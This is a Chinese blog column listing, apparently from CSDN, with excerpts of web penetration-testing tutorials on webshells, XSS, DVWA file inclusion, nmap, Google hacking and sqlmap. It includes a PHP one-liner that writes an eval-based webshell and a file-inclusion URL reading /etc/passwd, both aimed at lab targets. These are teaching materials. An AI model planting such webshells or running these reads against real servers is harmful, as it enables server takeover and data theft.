web
文章平均质量分 74
营长s
这个作者很懒,什么都没留下…
展开
-
文件上传 webshell 各类型 一句话木马 图片马 制作 教程
webshellwebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到图片马:原创 2021-06-05 15:42:53 · 9403 阅读 · 0 评论 -
XSS 跨站脚本攻击 构造各种类型脚本 理论和实战 反射型 储存性型 和 beEF 自动攻击
1.XSS简介和原理解析1.1 XSS相关概念 跨站脚本(Cross SiteScript)为了避免与样式CSS混淆,所以简称XSS XSS是经常出现在Web应用程序中的计算机安全漏洞,也是web中最主流的攻击方式,那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 如,盗取用户Cook原创 2021-05-20 21:39:10 · 433 阅读 · 0 评论 -
dvwa File Inclusion(文件包含) 低中高各个级别介绍及破解过程
本地文件包含http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似本地文件包含+webshell1.制作一句话木马 1234.jpg 推荐软件 edjpgcom<?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?>2.上传图片木马文件3.执行文件包含 并产生后门4.通过菜刀连接...原创 2021-05-19 17:27:17 · 942 阅读 · 0 评论 -
web 信息收集 之 nmap工具 目标扫描
1、nmap1.1 nmap简介Nmap是安全渗透最强大的开源四端口扫描器,能跨平台支持运行https://nmap.org/http://sectools.org/1.2 扫描示例主机发现 nmap -sn 192.168.106.134/24端口扫描 nmap -sS -p1-1000 192.168.106.134/24系统扫描 nmap -O 192.168.106.134/24版本扫描 nmap -sV 192.168.106.134/24综合扫描 nmap -A 1原创 2021-05-19 17:26:19 · 295 阅读 · 0 评论 -
web 信息收集 之 搜索引擎
一、信息收集概述1.web信息收集(探测)即web踩点,只要掌握目标web服务的方方面面,是实现web渗透入侵前的准备工作。2.web踩点内容包括操作系统,服务器类型,数据库类型,web语言,域名信息,网站目录。3.web信息收集涉及搜索引擎,往账扫描,指纹识别等工作。二、项目环境:目标靶机,owasp_Broken_web_Apps_vM_1.2测试渗透机:win7/kali三、google Hacking3.1 site功能:搜索制定的域名的网页内容,可以用来搜索子域名,更此域名相关原创 2021-05-19 17:25:56 · 391 阅读 · 0 评论 -
sqlmap 注入教程 常用命令大全
sqlmap 官网:http://sqlmap.org/sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage–hh 帮助手册 详细sqlmap.py -u “注入地址” --dbs // 列举数据库sqlmap.py -u “注入地址” --current–db // 当前数据库sqlmap.py -u “注入地址” --users // 列数据库用户sqlmap.py -u “注入地址” --c原创 2021-05-19 17:22:00 · 1203 阅读 · 0 评论